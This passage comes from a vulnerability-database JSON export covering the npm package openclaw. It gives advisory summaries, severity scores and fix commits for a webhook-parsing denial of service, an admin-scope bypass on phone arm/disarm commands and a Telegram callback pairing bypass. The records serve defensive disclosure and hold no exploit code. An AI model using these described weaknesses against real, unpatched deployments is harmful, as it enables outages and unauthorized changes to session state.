},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13"}],"aliases":["CVE-2026-32980","GHSA-jq3f-vjww-8rq7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tdjc-vav8-97cf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89742?format=json","vulnerability_id":"VCID-te8f-snty-j7hh","summary":"Duplicate Advisory: OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-3h52-cx59-c456. 
This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 parses JSON request bodies before validating webhook signatures, allowing unauthenticated attackers to force resource-intensive parsing operations. Remote attackers can send malicious webhook requests to trigger denial of service by exhausting server resources through forced JSON parsing before signature rejection.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35640","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{
"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35640"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing"},{"reference_url":"https://github.com/advisories/GHSA-8f9r-gr6r-x63q","reference_id":"GHSA-8f9r-gr6r-x63q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8f9r-gr6r-x63q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":
"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":
"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":
"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-8f9r-gr6r-x63q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-te8f-snty-j7hh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89104?format=json","vulnerability_id":"VCID-tf28-1z2z-5yfn","summary":"OpenClaw: `/phone arm`/`/phone disarm` Bypasses 
`operator.admin` Scope Check for External Channels\n## Summary\n`/phone arm`/`/phone disarm` Bypasses `operator.admin` Scope Check for External Channels\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Maintainers accepted this issue, fixed it in aa66ae1fc797d3298cc409ed2c5da69a89950a45 on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `aa66ae1fc797d3298cc409ed2c5da69a89950a45` — 2026-03-27T20:35:42Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41375","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25193","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.2513","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25179","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41375"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h2v7-xc88-xx8c","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h2v7-xc88-xx8c"},{"reference_url":"https://github.com/openclaw/openclaw/commit/aa66ae1fc797d3298cc409ed2c5da69a89950a45","reference_id":"aa66ae1fc797d3298cc409ed2c5da69a89950a45","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1"
,"scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/aa66ae1fc797d3298cc409ed2c5da69a89950a45"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41375","reference_id":"CVE-2026-41375","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41375"},{"reference_url":"https://github.com/advisories/GHSA-h2v7-xc88-xx8c","reference_id":"GHSA-h2v7-xc88-xx8c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h2v7-xc88-xx8c"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints","reference_id":"openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-h
kf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-m
fgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-y
kdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41375","GHSA-h2v7-xc88-xx8c"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://publi
c2.vulnerablecode.io/vulnerabilities/VCID-tf28-1z2z-5yfn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91270?format=json","vulnerability_id":"VCID-tk9h-nqrz-uugp","summary":"OpenClaw: Telegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State\n## Summary\n\nTelegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nTelegram callback queries from direct messages previously used weaker callback-only authorization and could mutate session state without satisfying normal DM pairing. Commit `269282ac69ab6030d5f30d04822668f607f13065` enforces DM authorization for callbacks.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `269282ac69ab6030d5f30d04822668f607f13065`.\n\n## Fix Commit(s)\n\n- 
`269282ac69ab6030d5f30d04822668f607f13065`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35661","reference_id":"","reference_type":"","scores":[{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17545","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.175","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17539","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35661"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"